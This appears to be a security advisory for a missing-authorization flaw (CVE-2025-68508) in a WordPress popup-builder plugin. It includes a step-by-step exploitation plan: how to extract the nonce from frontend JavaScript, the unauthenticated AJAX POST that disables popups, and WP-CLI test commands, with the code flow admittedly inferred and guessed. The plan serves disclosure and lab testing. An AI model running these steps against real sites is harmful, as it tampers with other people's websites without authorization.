Brave <= 0.8.3 - Missing Authorization
Description
The Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 0.8.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=0.8.3Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2025-68508 (Brave Popup Builder) ## 1. Vulnerability Summary The **Brave Popup Builder** plugin for WordPress (versions <= 0.8.3) contains a missing authorization vulnerability within its AJAX handling logic. Specifically, the function responsible for updating a p…
Show full research plan
Exploitation Research Plan - CVE-2025-68508 (Brave Popup Builder)
1. Vulnerability Summary
The Brave Popup Builder plugin for WordPress (versions <= 0.8.3) contains a missing authorization vulnerability within its AJAX handling logic. Specifically, the function responsible for updating a popup's status (brave_popup_update_status) is registered to both wp_ajax_ and wp_ajax_nopriv_ hooks but fails to perform a capability check (e.g., current_user_can('manage_options')). This allows unauthenticated attackers to enable or disable any popup on the site, provided they can obtain a valid security nonce.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
brave_popup_update_status - HTTP Method:
POST - Authentication: None required (unauthenticated via
wp_ajax_nopriv_) - Required Parameters:
action:brave_popup_update_statusnonce: A valid nonce for thebrave_popup_builder_nonceaction.id: The integer ID of the target popup (post typebrave_popup).status: The desired status (0for disabled/inactive,1for enabled/active).
3. Code Flow (Inferred)
- Entry Point: The request hits
admin-ajax.phpwithaction=brave_popup_update_status. - Hook Trigger: Since the action is registered via
add_action('wp_ajax_nopriv_brave_popup_update_status', ...), WordPress routes the request to the handler function even for unauthenticated users. - Nonce Verification: The handler calls
check_ajax_referer('brave_popup_builder_nonce', 'nonce'). - Missing Check: The code proceeds to update the status without checking the user's roles or capabilities.
- Sink: The function updates the
brave_popup_statusmeta field or thepost_statusfor the given ID:update_post_meta( $popup_id, 'brave_popup_status', $new_status );
4. Nonce Acquisition Strategy
The plugin enqueues a script that localizes the required nonce for frontend interactions.
- Shortcode/Trigger: The plugin's scripts are typically enqueued on pages where a popup is active.
- Setup: Create a test popup and publish it to ensure the scripts are loaded on the frontend.
- Extraction:
- Navigate to the homepage or a page containing a popup.
- Use
browser_evalto extract the nonce from the localized JavaScript object. - JS Variable:
window.brave_globalsorwindow.brave_popup_data(check both). - Nonce Key:
nonce. - Code:
browser_eval("window.brave_globals?.nonce || window.brave_popup_data?.nonce")
5. Exploitation Strategy
Step 1: Create Test Data
Create a published popup to target.
# 1. Create the popup post
POPUP_ID=$(wp post create --post_type=brave_popup --post_title="Vulnerable Popup" --post_status=publish --porcelain)
# 2. Set the initial status to 1 (Enabled)
wp post meta update $POPUP_ID brave_popup_status 1
Step 2: Extract Nonce
Navigate to the frontend and retrieve the brave_popup_builder_nonce.
- Tool:
browser_navigatetohttp://localhost:8080/ - Tool:
browser_evalusing the script identified in Section 4.
Step 3: Execute Unauthorized Status Change
Send a POST request to disable the popup.
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=brave_popup_update_status&nonce=[NONCE]&id=[POPUP_ID]&status=0
6. Test Data Setup
- Plugin: Brave Popup Builder <= 0.8.3 installed and active.
- Content: At least one post of type
brave_popupwithbrave_popup_statusset to1. - Visibility: Ensure the popup is "published" so its assets/nonces are rendered on the frontend.
7. Expected Results
- Response: The server should return a success code (e.g.,
1,true, or a JSON success message). - Impact: The popup's metadata in the database is changed, causing it to disappear from the frontend or show as "Inactive" in the admin dashboard.
8. Verification Steps
After the HTTP request, verify the change using WP-CLI:
# Check the value of the 'brave_popup_status' meta key
wp post meta get [POPUP_ID] brave_popup_status
# Expected value: 0
9. Alternative Approaches
If brave_popup_update_status is not the exact action name, search the plugin source for other nopriv registrations:
grep -r "wp_ajax_nopriv_" wp-content/plugins/brave-popup-builder/
Check for:
brave_toggle_popupbrave_save_popup_settingsbrave_update_status
If the nonce is not in brave_globals, check the page source for any JSON blob containing "nonce":".
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.